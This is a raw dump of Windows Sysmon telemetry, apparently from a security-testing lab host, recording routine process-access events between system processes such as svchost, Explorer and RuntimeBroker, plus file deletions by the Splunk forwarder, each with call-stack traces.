12:02:32.692{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.692{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.692{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.567{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+1a9001|C:\Windows\System32\TwinUI.dll+bade1|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.567{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+1a9001|C:\Windows\System32\TwinUI.dll+bade1|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.567{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+1a9001|C:\Windows\System32\TwinUI.dll+bade1|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.567{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+badc3|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.567{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+badc3|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.552{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12a3cc|C:\Windows\System32\TwinUI.dll+b60d4|C:\Windows\System32\TwinUI.dll+b1e1b|C:\Windows\System32\TwinUI.dll+d206a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.552{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.552{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.380{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15B058FAB55CAC0AF30D5735C48C3888,SHA256=1F77C03549314F37F0FAC7BAD79F0D2940DAC822A51EA7B0D47B99447D2FE57B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.100{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=525B8C20864DB8CA989D16BF09BDEFA5,SHA256=B0A746C05F99570712C96E7222F08D4039525766E3B0915348FCD276B36ED268,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.038{266CAFBE-64C4-6064-9B00-00000000AE01}49246152C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000007364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.038{266CAFBE-64C4-6064-9B00-00000000AE01}49246152C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000007363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246152C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000007362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246152C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000007361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246072C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.onecore.dll+1602f|C:\Windows\system32\windows.cortana.onecore.dll+16127|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000007356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.007{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+4